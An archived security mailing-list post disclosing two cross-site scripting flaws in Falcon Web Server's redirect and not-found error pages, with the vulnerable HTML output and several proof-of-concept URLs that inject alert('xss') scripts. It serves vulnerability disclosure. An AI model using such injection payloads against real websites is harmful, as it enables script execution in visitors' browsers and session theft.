lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <001f01c23f33$b3b71f80$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: Cross-Site Scripting Issues in Falcon Web Server

>From Developer:

"Falcon Web Server is running under Windows NT/2000/XP as well as Windows
95/98. It supports ISAPI and WinCGI, and it is a fully  functional web
server which is capable of running a small / medium scale website of about
50-80 hits per minute.  The real advantage of Falcon Web Server is the
ability to run on a desktop computer with almost the same functionality as
large-scale web servers like MS IIS and Apache."

A lack of input sanitation in the error message output of this server makes
it susceptible to two cross-site scripting vulnerabilities:

* An issue in the way the server handles 301 messages when a file is not
found, and the request is not terminated by a slash.  Falcon simply adds a
slash to the request URI, and sends back a 301 with the following entity:

<html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>Redir
ecting browser to <a
href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><b
r>If nothing happens click the link above.</body></html>

* An issue in the way the server handles 404 messages when a file/folder is
not found, and the necessary slash has been added (entity below):

<html><head><title>HTTP/1.0 404 Not
Found</title></head><body><h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not
Found</h1><p>Cannot locate the requested file.</body></html>

Examples:

* 301 Message XSS

Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

* 404 Message XSS

http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

The 301 examples will simply add a slash and pass it on to the browser,
which then raises a 404, exploiting that vulnerability as well (although the
301 exploits will cause some useless HTML to be added on)

"The reason the mainstream is thought
of as a stream is because it is
so shallow."
                     - Author Unknown


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ